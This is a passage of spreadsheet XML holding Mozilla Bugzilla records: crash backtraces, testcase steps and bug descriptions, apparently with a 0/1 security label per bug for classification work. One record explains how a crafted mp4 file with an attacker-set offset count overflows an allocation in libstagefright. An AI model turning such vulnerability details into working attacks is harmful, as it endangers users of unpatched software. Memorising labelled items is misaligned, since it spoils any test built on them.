    l=@0x7fffffffcf58: 0x1620d96490b0) at js/src/gc/Barrier.h:1165
#3  mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt; &gt;, mozilla::HashMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt;, js::MovableCellHasher&lt;js::HeapPtr
&lt;JSObject*&gt; &gt;, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::MapHashPolicy, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::match (
    aEntry=..., aLookup=@0x7fffffffcf58: 0x1620d96490b0)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/HashTable.h:1735
#4  mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt; &gt;, mozilla::HashMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt;, js::MovableCellHasher&lt;js::HeapPtr
&lt;JSObject*&gt; &gt;, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::MapHashPolicy, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::lookup&lt;(mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;js::HeapPtr&lt;JSObject
*&gt;, js::HeapPtr&lt;JS::Value&gt; &gt;, mozilla::HashMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt;, js::MovableCellHasher&lt;js::HeapPtr&lt;JSObject*&gt; &gt;, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::MapHashPoli
cy, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::LookupReason)1&gt; (
    this=this@entry=0x7ffff4c54240, aLookup=@0x7fffffffcf58: 0x1620d96490b0, aKeyHash=&lt;optimized out&gt;,
    aKeyHash@entry=389894670)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/HashTable.h:1765
#5  0x00005555575d5239 in mozilla::detail::HashTable&lt;mozilla::HashMapEntry&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt; &gt;, mozilla::HashMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt;, js::Movable
CellHasher&lt;js::HeapPtr&lt;JSObject*&gt; &gt;, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::MapHashPolicy, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::lookupForAdd (this=0x7ffff4c54240, aLookup=@0x7fffffffc
f58: 0x1620d96490b0)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/HashTable.h:2104
#6  0x00005555579a4160 in mozilla::HashMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt;, js::MovableCellHasher&lt;js::HeapPtr&lt;JSObject*&gt; &gt;, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::lookupForAdd (t
his=0x7ffff4c54240,
    aLookup=@0x7fffffffcf58: 0x1620d96490b0)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/HashTable.h:336
#7  js::WeakMap&lt;js::HeapPtr&lt;JSObject*&gt;, js::HeapPtr&lt;JS::Value&gt; &gt;::lookupForAdd (this=0x7ffff4c54208,
    l=@0x7fffffffcf58: 0x1620d96490b0) at js/src/gc/WeakMap.h:222
#8  js::gc::FinalizationObservers::removeCrossZoneWrapper (this=this@entry=0x7ffff4c541a0, weakSet=...,
    wrapper=wrapper@entry=0x1620d96490b0)
    at js/src/gc/FinalizationObservers.cpp:141
#9  0x00005555579a65a2 in js::gc::FinalizationObservers::updateForRemovedRecord (this=this@entry=0x7ffff4c541a0,
    wrapper=wrapper@entry=0x1620d96490b0, record=record@entry=0x1620d9686040)
    at js/src/gc/FinalizationObservers.cpp:268
#10 0x00005555579a5fc9 in js::gc::FinalizationObservers::traceWeakFinalizationRegistryEdges(JSTracer*)::$_2::operator()(js::HeapPtr&lt;JSObject*&gt;&amp;) const (heapPtr=..., this=&lt;optimized out&gt;)
    at js/src/gc/FinalizationObservers.cpp:224
#11 JS::GCVector&lt;js::HeapPtr&lt;JSObject*&gt;, 1ul, js::TrackedAllocPolicy&lt;(js::TrackingKind)1&gt; &gt;::mutableEraseIf&lt;js::gc::FinalizationObservers::traceWeakFinalizationRegistryEdges(JSTracer*)::$_2&gt;(js::gc::Fi
nalizationObservers::traceWeakFinalizationRegistryEdges(JSTracer*)::$_2) (this=0x7ffff4cf9908, pred=...)
    at obj-x86_64-pc-linux-gnu/dist/include/js/GCVector.h:183
#12 js::gc::FinalizationObservers::traceWeakFinalizationRegistryEdges (this=this@entry=0x7ffff4c541a0, 
    trc=&lt;optimized out&gt;, trc@entry=0x7fffffffd100)
    at js/src/gc/FinalizationObservers.cpp:215
#13 0x00005555579a167e in js::gc::FinalizationObservers::traceWeakEdges (this=0x7ffff4c541a0, trc=0x7fffffffd100)
    at js/src/gc/FinalizationObservers.cpp:189
#14 js::gc::GCRuntime::traceWeakFinalizationObserverEdges (trc=0x7fffffffd100, zone=0x7ffff4c2b000, 
    this=&lt;optimized out&gt;) at js/src/gc/FinalizationObservers.cpp:176
#15 js::gc::GCRuntime::sweepZoneAfterCompacting (this=this@entry=0x7ffff7423728, trc=trc@entry=0x7fffffffd100, 
    zone=zone@entry=0x7ffff4c2b000) at js/src/gc/Compacting.cpp:458
#16 0x000055555799dfe9 in js::gc::GCRuntime::updateZonePointersToRelocatedCells (this=this@entry=0x7ffff7423728, zone=zone@entry=0x7ffff4c2b000)
    at js/src/gc/Compacting.cpp:778
#17 0x000055555799d3ef in js::gc::GCRuntime::compactPhase (this=this@entry=0x7ffff7423728, reason=reason@entry=JS::GCReason::SHARED_MEMORY_LIMIT, 
    sliceBudget=..., session=...) at js/src/gc/Compacting.cpp:90
#18 0x00005555579bfef4 in js::gc::GCRuntime::incrementalSlice (this=this@entry=0x7ffff7423728, budget=..., 
    reason=reason@entry=JS::GCReason::SHARED_MEMORY_LIMIT, budgetWasIncreased=&lt;optimized out&gt;) at js/src/gc/GC.cpp:3748
#19 0x00005555579c2b68 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff7423728, nonincrementalByAPI=true, budgetArg=...,
    reason=reason@entry=JS::GCReason::SHARED_MEMORY_LIMIT) at js/src/gc/GC.cpp:4212
#20 0x00005555579c3dd3 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff7423728, nonincrementalByAPI=&lt;optimized out&gt;, budget=...,
    reason=reason@entry=JS::GCReason::SHARED_MEMORY_LIMIT) at js/src/gc/GC.cpp:4400
#21 0x0000555557998618 in js::gc::GCRuntime::gc (this=0x7ffff7423728, options=JS::GCOptions::Shrink, reason=JS::GCReason::SHARED_MEMORY_LIMIT)
    at js/src/gc/GC.cpp:4477
#22 0x000055555734c466 in JSRuntime::onOutOfMemoryCanGC (this=0x7ffff7423000, allocFunc=js::AllocFunction::Malloc, arena=5098337497085642432,
    bytes=26214400, reallocPtr=0x0) at js/src/vm/Runtime.cpp:698
#23 0x00005555575a2d14 in ReportLargeAllocationFailure (cx=cx@entry=0x7ffff7437300, argc=0, vp=&lt;optimized out&gt;)
    at js/src/builtin/TestingFunctions.cpp:5693
#24 0x0000555556ec1594 in CallJSNative (cx=cx@entry=0x7ffff7437300,
    native=native@entry=0x5555575a2c10 &lt;ReportLargeAllocationFailure(JSContext*, unsigned int, JS::Value*)&gt;, reason=reason@entry=js::CallReason::Call,
    args=...) at js/src/vm/Interpreter.cpp:459
#25 0x0000555556ec095e in js::InternalCallOrConstruct (cx=0x7ffff7437300, cx@entry=0x5555588fd290 &lt;Interpret(JSContext*, js::RunState&amp;)::addresses&gt;,
    args=..., construct=construct@entry=js::NO_CONSTRUCT, reason=js::CallReason::Call, reason@entry=4294967286)
    at js/src/vm/Interpreter.cpp:553
#26 0x0000555556ec26c6 in InternalCall (cx=0x7ffff79f8a00 &lt;_IO_stdfile_2_lock&gt;, args=..., reason=1497881232)
    at js/src/vm/Interpreter.cpp:620
#27 0x0000555556eb405a in js::CallFromStack (cx=0x7ffff79f8a00 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0xffff800000000000, args=..., reason=&lt;optimized out&gt;)
    at js/src/vm/Interpreter.cpp:625
#28 Interpret (cx=0x7ffff79f8a00 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0x7ffff7437300, state=...)
    at js/src/vm/Interpreter.cpp:3368
#29 0x0000555556ea6fd5 in js::RunScript (cx=cx@entry=0x7ffff7437300, state=...) at js/src/vm/Interpreter.cpp:431
#30 0x0000555556ec4722 in js::ExecuteKernel (cx=cx@entry=0x7ffff7437300, script=script@entry=..., envChainArg=envChainArg@entry=...,
    evalInFrame=evalInFrame@entry=..., result=...) at js/src/vm/Interpreter.cpp:818
#31 0x0000555556ec4dd1 in js::Execute (cx=cx@entry=0x7ffff7437300, script=script@entry=..., envChain=..., rval=rval@entry=...)
    at js/src/vm/Interpreter.cpp:850
#32 0x0000555557071b86 in ExecuteScript (cx=cx@entry=0x7ffff7437300, envChain=..., script=..., rval=rval@entry=...)
    at js/src/vm/CompilationAndEvaluation.cpp:472
#33 0x0000555557071e60 in JS_ExecuteScript (cx=cx@entry=0x7ffff7437300, scriptArg=scriptArg@entry=...)
    at js/src/vm/CompilationAndEvaluation.cpp:496
```</t>
        </is>
      </c>
      <c r="X484" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" t="n">
        <v>1250875</v>
      </c>
      <c r="B485" t="inlineStr">
        <is>
          <t>2016-02-24 04:59:27 -0800</t>
        </is>
      </c>
      <c r="C485" t="inlineStr">
        <is>
          <t>Bugzilla crashes immediately due to unreadable META.json and MYMETA.json</t>
        </is>
      </c>
      <c r="D485" t="inlineStr">
        <is>
          <t>2016-02-24 07:13:58 -0800</t>
        </is>
      </c>
      <c r="E485" t="n">
        <v>1</v>
      </c>
      <c r="F485" t="n">
        <v>1</v>
      </c>
      <c r="G485" t="n">
        <v>4</v>
      </c>
      <c r="H485" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I485" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J485" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K485" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="L485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N485" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P485" t="inlineStr"/>
      <c r="Q485" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R485" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S485" t="inlineStr">
        <is>
          <t>Bugzilla 6.0</t>
        </is>
      </c>
      <c r="T485" t="n">
        <v>1</v>
      </c>
      <c r="U485" t="n">
        <v>0</v>
      </c>
      <c r="V485" t="n">
        <v>7</v>
      </c>
      <c r="W485" t="inlineStr">
        <is>
          <t>1) git pull
2) ./checksetup.pl
3) access Bugzilla from your web browser:
unable to open ./META.json: Permission denied at Bugzilla.pm line 289.
So permissions are wrong:
-rw-------  1 root apache 9.5K fév 24 13:49 META.json
-rw-------  1 root apache 4.3K fév 24 13:49 META.yml
-rw-------  1 root apache 9.2K fév 24 13:49 Makefile.PL
Either that, or Bugzilla is not supposed to access META.json; I don't know.</t>
        </is>
      </c>
      <c r="X485" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="486">
      <c r="A486" t="n">
        <v>1355182</v>
      </c>
      <c r="B486" t="inlineStr">
        <is>
          <t>2017-04-10 12:12:19 -0700</t>
        </is>
      </c>
      <c r="C486" t="inlineStr">
        <is>
          <t>Graphite2: Assertion 'size() &gt; n' failed [@ graphite2::FeatureRef::applyValToFeature]</t>
        </is>
      </c>
      <c r="D486" t="inlineStr">
        <is>
          <t>2017-10-26 19:20:25 -0700</t>
        </is>
      </c>
      <c r="E486" t="n">
        <v>1</v>
      </c>
      <c r="F486" t="n">
        <v>1</v>
      </c>
      <c r="G486" t="n">
        <v>3</v>
      </c>
      <c r="H486" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I486" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J486" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K486" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N486" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P486" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q486" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R486" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S486" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T486" t="n">
        <v>1</v>
      </c>
      <c r="U486" t="n">
        <v>0</v>
      </c>
      <c r="V486" t="n">
        <v>8</v>
      </c>
      <c r="W486" t="inlineStr">
        <is>
          <t>Created attachment 8856655
test_case.ttf
Found with a 32bit build running gr2FontTest.
STR:
Run in gdb with a 32-bit debug build.
gdb --args ./g2fonttest test_case.ttf -auto -demand -noprint
gr2fonttest: src/inc/List.h:81: reference graphite2::Vector&lt;unsigned int&gt;::operator[](size_t) [T = unsigned int]: Assertion `size() &gt; n' failed.
Program received signal SIGABRT, Aborted.
0xf7fd7c89 in __kernel_vsyscall ()
(gdb) bt
#0  0xf7fd7c89 in __kernel_vsyscall ()
#1  0xf7cafea9 in __GI_raise (sig=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#2  0xf7cb1407 in __GI_abort () at abort.c:89
#3  0xf7ca8d07 in __assert_fail_base (
    fmt=0xf7de3088 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", 
    assertion=0x808c3a8 "size() &gt; n", 
    file=0x808b89b "src/inc/List.h", line=81, 
    function=0x808c3b3 "reference graphite2::Vector&lt;unsigned int&gt;::operator[](size_t) [T = unsigned int]") at assert.c:92
#4  0xf7ca8d8b in __GI___assert_fail (assertion=0x808c3a8 "size() &gt; n", 
    file=0x808b89b "src/inc/List.h", line=81, 
    function=0x808c3b3 "reference graphite2::Vector&lt;unsigned int&gt;::operator[](size_t) [T = unsigned int]") at assert.c:101
#5  0x080572af in graphite2::Vector&lt;unsigned int&gt;::operator[] (n=&lt;optimized out&gt;, 
    this=&lt;optimized out&gt;) at src/inc/List.h:81
#6  graphite2::FeatureRef::applyValToFeature (this=&lt;optimized out&gt;, val=3888, pDest=...)
    at src/FeatureMap.cpp:279
#7  0x08056eea in graphite2::FeatureMap::readFeats (this=&lt;optimized out&gt;, face=...)
    at src/FeatureMap.cpp:178
#8  0x08057371 in graphite2::SillMap::readFace (this=0x80abd04, face=...)
    at src/FeatureMap.cpp:191
#9  0x08055330 in graphite2::Face::readFeatures (this=0x80abd00)
    at src/Face.cpp:161
#10 0x0804f251 in (anonymous namespace)::load_face (face=..., options=&lt;optimized out&gt;)
    at src/gr_face.cpp:59
#11 gr_make_face_with_ops (appFaceHandle=&lt;optimized out&gt;, ops=&lt;optimized out&gt;, 
    faceOptions=&lt;optimized out&gt;) at src/gr_face.cpp:89
#12 0x080502c2 in gr_make_file_face (filename=&lt;optimized out&gt;, faceOptions=0)
    at src/gr_face.cpp:242
#13 0x0804c6eb in Parameters::testFileFont (this=0xffffcf28)
    at gr2fonttest/gr2FontTest.cpp:639
#14 0x0804d9ed in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;)
    at gr2fonttest/gr2FontTest.cpp:798</t>
        </is>
      </c>
      <c r="X486" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="487">
      <c r="A487" t="n">
        <v>774953</v>
      </c>
      <c r="B487" t="inlineStr">
        <is>
          <t>2012-07-17 17:36:20 -0700</t>
        </is>
      </c>
      <c r="C487" t="inlineStr">
        <is>
          <t>"Assertion failure: [infer failure] Missing type pushed 0" with iframes, adoptNode</t>
        </is>
      </c>
      <c r="D487" t="inlineStr">
        <is>
          <t>2014-02-26 12:02:03 -0800</t>
        </is>
      </c>
      <c r="E487" t="n">
        <v>1</v>
      </c>
      <c r="F487" t="n">
        <v>1</v>
      </c>
      <c r="G487" t="n">
        <v>3</v>
      </c>
      <c r="H487" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I487" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J487" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K487" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L487" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M487" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N487" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P487" t="inlineStr">
        <is>
          <t>[js:p1:fx17][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q487" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R487" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S487" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T487" t="n">
        <v>1</v>
      </c>
      <c r="U487" t="n">
        <v>0</v>
      </c>
      <c r="V487" t="n">
        <v>15</v>
      </c>
      <c r="W487" t="inlineStr">
        <is>
          <t>Created attachment 643204
testcase
With
  user_pref("javascript.options.methodjit_always", true);
the testcase triggers:
Assertion failure: [infer failure] Missing type pushed 0: [0x10a0398e0], at js/src/jsinfer.cpp:325
Based on js/xpconnect/crashtests/515726-1.html</t>
        </is>
      </c>
      <c r="X487" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" t="n">
        <v>902873</v>
      </c>
      <c r="B488" t="inlineStr">
        <is>
          <t>2013-08-08 05:18:18 -0700</t>
        </is>
      </c>
      <c r="C488" t="inlineStr">
        <is>
          <t>[Contacts] Performance improvements when selecting in contact list</t>
        </is>
      </c>
      <c r="D488" t="inlineStr">
        <is>
          <t>2013-10-24 12:24:51 -0700</t>
        </is>
      </c>
      <c r="E488" t="n">
        <v>1</v>
      </c>
      <c r="F488" t="n">
        <v>1</v>
      </c>
      <c r="G488" t="n">
        <v>6</v>
      </c>
      <c r="H488" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I488" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J488" t="inlineStr">
        <is>
          <t>Gaia::Contacts</t>
        </is>
      </c>
      <c r="K488" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L488" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M488" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N488" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P488" t="inlineStr">
        <is>
          <t>[c= p=4 s= u=1.2]</t>
        </is>
      </c>
      <c r="Q488" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R488" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S488" t="inlineStr">
        <is>
          <t>1.2 C3(Oct25)</t>
        </is>
      </c>
      <c r="T488" t="n">
        <v>1</v>
      </c>
      <c r="U488" t="n">
        <v>0</v>
      </c>
      <c r="V488" t="n">
        <v>37</v>
      </c>
      <c r="W488" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #901079 +++
As part of the review of bug 901079, we decided to move to a different but (this one), some task that we have pending to improve the contact list in select mode.
We did this to work in parallel in this improvements and the export functionality that depends on this select mode.
Some of the topics (sure we can find more) we have pending for this bug are already commented in PR: 
https://github.com/mozilla-b2g/gaia/pull/11398
There we found things like:
- Better css selectors
- Take care of the navigator.mozContacts.find({}) we do in the contacts selecte promise
- Click handler in the search while in select mode
Sure we can find as well more points of improvement :)</t>
        </is>
      </c>
      <c r="X488" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="489">
      <c r="A489" t="n">
        <v>1767360</v>
      </c>
      <c r="B489" t="inlineStr">
        <is>
          <t>2022-05-02 17:09:47 -0700</t>
        </is>
      </c>
      <c r="C489" t="inlineStr">
        <is>
          <t>Crash in UpdateSubresource when playing H264</t>
        </is>
      </c>
      <c r="D489" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:09 -0700</t>
        </is>
      </c>
      <c r="E489" t="n">
        <v>1</v>
      </c>
      <c r="F489" t="n">
        <v>1</v>
      </c>
      <c r="G489" t="n">
        <v>3</v>
      </c>
      <c r="H489" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I489" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J489" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K489" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L489" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M489" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N489" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P489" t="inlineStr">
        <is>
          <t>[adv-main105+][adv-esr102.3+]</t>
        </is>
      </c>
      <c r="Q489" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R489" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S489" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T489" t="n">
        <v>1</v>
      </c>
      <c r="U489" t="n">
        <v>0</v>
      </c>
      <c r="V489" t="n">
        <v>38</v>
      </c>
      <c r="W489" t="inlineStr">
        <is>
          <t>https://crash-stats.mozilla.org/report/index/7dd89fc9-df31-4fc0-ab38-2c1f80220502
We're trying to upload 496x1040 from a buffer that's not that big.</t>
        </is>
      </c>
      <c r="X489" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="490">
      <c r="A490" t="n">
        <v>1170344</v>
      </c>
      <c r="B490" t="inlineStr">
        <is>
          <t>2015-06-01 15:14:41 -0700</t>
        </is>
      </c>
      <c r="C490" t="inlineStr">
        <is>
          <t>int oveflow in libstagefright during mp4 parsing</t>
        </is>
      </c>
      <c r="D490" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:48 -0700</t>
        </is>
      </c>
      <c r="E490" t="n">
        <v>1</v>
      </c>
      <c r="F490" t="n">
        <v>1</v>
      </c>
      <c r="G490" t="n">
        <v>3</v>
      </c>
      <c r="H490" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I490" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J490" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K490" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L490" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M490" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N490" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P490" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+] fixed in bug 1185115</t>
        </is>
      </c>
      <c r="Q490" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R490" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S490" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T490" t="n">
        <v>1</v>
      </c>
      <c r="U490" t="n">
        <v>0</v>
      </c>
      <c r="V490" t="n">
        <v>7</v>
      </c>
      <c r="W490" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Steps to reproduce:
A specially crafted mp4 file can cause an integer overflow in VectorImpl::setCapacity. If there is a 'saio' tag in a mp4 file MPEG4Extractor::parseChunk calls SampleTable::setSampleAuxiliaryInformationOffsetParams. The latter function calls  mCencOffsets.setCapacity(cencOffsetCount) with cencOffsetCount fully controlled by an attacker. The setCapacity is implemented in VectorImpl::setCapacity. In this function SharedBuffer::alloc(new_capacity * mItemSize) is called with new_capacity under attacker control. Multiplication with mItemSize (8 in this particular case) might causes an integer overflow. For example new_capacity set to 0x20000001 results in a 8 byte allocation.</t>
        </is>
      </c>
      <c r="X490" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="491">
      <c r="A491" t="n">
        <v>750575</v>
      </c>
      <c r="B491" t="inlineStr">
        <is>
          <t>2012-04-30 18:03:57 -0700</t>
        </is>
      </c>
      <c r="C491" t="inlineStr">
        <is>
          <t>Invalid read (from deleted presShell) calling canvas strokeText during full-screen transition</t>
        </is>
      </c>
      <c r="D491" t="inlineStr">
        <is>
          <t>2012-07-20 18:24:03 -0700</t>
        </is>
      </c>
      <c r="E491" t="n">
        <v>1</v>
      </c>
      <c r="F491" t="n">
        <v>1</v>
      </c>
      <c r="G491" t="n">
        <v>3</v>
      </c>
      <c r="H491" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I491" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J491" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K491" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N491" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O491" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P491" t="inlineStr">
        <is>
          <t>[sg:critical][qa+][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q491" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R491" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S491" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T491" t="n">
        <v>1</v>
      </c>
      <c r="U491" t="n">
        <v>0</v>
      </c>
      <c r="V491" t="n">
        <v>36</v>
      </c>
      <c r="W491" t="inlineStr">
        <is>
          <t>Created attachment 619793
testcase (requires pref) (requires focus) (crashes Firefox)
1. Set
  user_pref("full-screen-api.allow-trusted-requests-only", false);
2. Load the testcase.
Result: GetPresContext is called on a deleted pres shell, usually causing a crash (which by coincidence looks like a null pres context deref).</t>
        </is>
      </c>
      <c r="X491" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="492">
      <c r="A492" t="n">
        <v>1248639</v>
      </c>
      <c r="B492" t="inlineStr">
        <is>
          <t>2016-02-16 08:57:47 -0800</t>
        </is>
      </c>
      <c r="C492" t="inlineStr">
        <is>
          <t>adding images under the Open link in a Container Tab context menu</t>
        </is>
      </c>
      <c r="D492" t="inlineStr">
        <is>
          <t>2016-08-25 12:06:34 -0700</t>
        </is>
      </c>
      <c r="E492" t="n">
        <v>1</v>
      </c>
      <c r="F492" t="n">
        <v>1</v>
      </c>
      <c r="G492" t="n">
        <v>2</v>
      </c>
      <c r="H492" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I492" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J492" t="inlineStr">
        <is>
          <t>Menus</t>
        </is>
      </c>
      <c r="K492" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N492" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P492" t="inlineStr">
        <is>
          <t>[userContextId][userContextId-UI][uplift49-]</t>
        </is>
      </c>
      <c r="Q492" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R492" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S492" t="inlineStr">
        <is>
          <t>Firefox 50</t>
